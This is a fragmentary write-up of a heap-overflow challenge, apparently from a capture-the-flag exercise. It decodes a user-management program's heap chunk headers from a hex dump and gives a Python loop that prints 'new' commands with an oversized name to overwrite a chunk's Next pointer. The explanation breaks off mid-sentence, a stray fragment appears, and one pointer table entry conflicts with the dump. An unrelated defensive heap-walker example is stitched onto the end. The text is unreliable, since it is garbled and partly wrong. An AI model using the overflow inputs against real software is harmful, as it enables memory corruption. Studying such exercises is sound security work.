Hash Table, plus one full box:

```
5000: 0050 1050 1500 0b00 0300 0500 1650 2c50 .P.P.........P,P
5010: 0050 2650 2100 4250 a250 0251 6251 c251 .P&P!.BP.P.QbQ.Q
5020: 2252 8252 e252 1050 3c50 2100 0b00 0000 "R.R.R.P
```

```
+1) - 1)
04: 0005: Parameter 2 (Rightshift?)
06: 5016: & Box Pointer List
08: 502c: & Per-box User Count List
```

Box Pointer List:

```
Box list header metadata @ 5010:
0050 2650 2100 [ Prev: 5000, Next: 5026, Size: 0010 ]
Data: 4250 a250 0251 6251 c251 2252 8252 e252
00: 5042 & Box 0
02: 50a2 & Box 1
04: 5102 & Box 2
06: 5162 & Box 3
08: 51c2 & Box 4
0a: 52c2 & Box 5
0c: 5282 & Box 6
0e: 52e2 & Box 7
```

Other Data Section (?)

```
Section header metadata @ 5026:
1050 3c50 2100 [ Prev: 5010, Next: 503c, Size: 0010 ]
Data: 0a00 0000 0000 0000 0000 0000 0000 0000
```

The Exploit:

When an 11th user is added, the software will attempt to double the size of the heap. Overwriting a heap Next pointer allows us to

AAAA

```python
# Print the "new <name> ;" commands on one line: ten one-character names, a 16-byte name, then an empty one.
for c in ['1', '9', 'A', 'I', 'Q', '0', '8', '@', 'H', 'P', 'AAAAAAAAAAAAAAAA', '']:
    print(f'new {c} ;', end="")
```
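As an added example (not code from the original write-up), the sketch below decodes the Prev/Next/Size headers from the hex dump above and checks that each chunk's links are consistent, which is the check an overwritten Next pointer fails. The size-word decoding (low bit as an in-use flag), the helper names and the tampered value 0x5020 are assumptions made for illustration.

```python
import struct

BASE, HDR = 0x5000, 6  # dump start; header = Prev, Next, Size (three 16-bit words)
# The 0x30 bytes at 0x5000, copied from the hex dump above in memory order.
DUMP = bytes.fromhex(
    "0050105015000b000300050016502c50"
    "0050265021004250a25002516251c251"
    "22528252e25210503c5021000b000000"
)

def walk(mem, base=BASE):
    """Walk the chunk list in mem; return (chunks, problems)."""
    chunks, problems, seen = [], [], set()
    addr, end = base, base + len(mem)
    while base <= addr and addr + HDR <= end and addr not in seen:
        seen.add(addr)
        prev, nxt, raw = struct.unpack_from("<HHH", mem, addr - base)
        # Assumption: low bit of the size word is an in-use flag, the rest
        # is the payload size (the page decodes raw 0x0021 as Size 0010).
        size, used = raw >> 1, raw & 1
        chunks.append((addr, prev, nxt, size, used))
        expect = addr + HDR + size
        if nxt != expect:
            problems.append(f"{addr:04x}: Next {nxt:04x}, expected {expect:04x}")
        if base <= nxt and nxt + HDR <= end:
            back = struct.unpack_from("<H", mem, nxt - base)[0]
            if back != addr:
                problems.append(f"{nxt:04x}: Prev {back:04x}, expected {addr:04x}")
        if problems:
            break  # do not follow a pointer that failed validation
        addr = nxt
    return chunks, problems

def tampered_copy():
    """Constructed corruption: rewrite Next of the chunk at 0x5010."""
    buf = bytearray(DUMP)
    struct.pack_into("<H", buf, 0x5012 - BASE, 0x5020)  # 0x5020 is made up
    return bytes(buf)

if __name__ == "__main__":
    for label, mem in (("dump", DUMP), ("tampered", tampered_copy())):
        chunks, problems = walk(mem)
        for addr, prev, nxt, size, used in chunks:
            print(f"{label}: {addr:04x} prev={prev:04x} next={nxt:04x} size={size:04x} used={used}")
        for p in problems:
            print(f"{label}: CORRUPT {p}")
```

The walk stops at 0x503c because that header lies past the end of the 0x30 bytes shown in the dump.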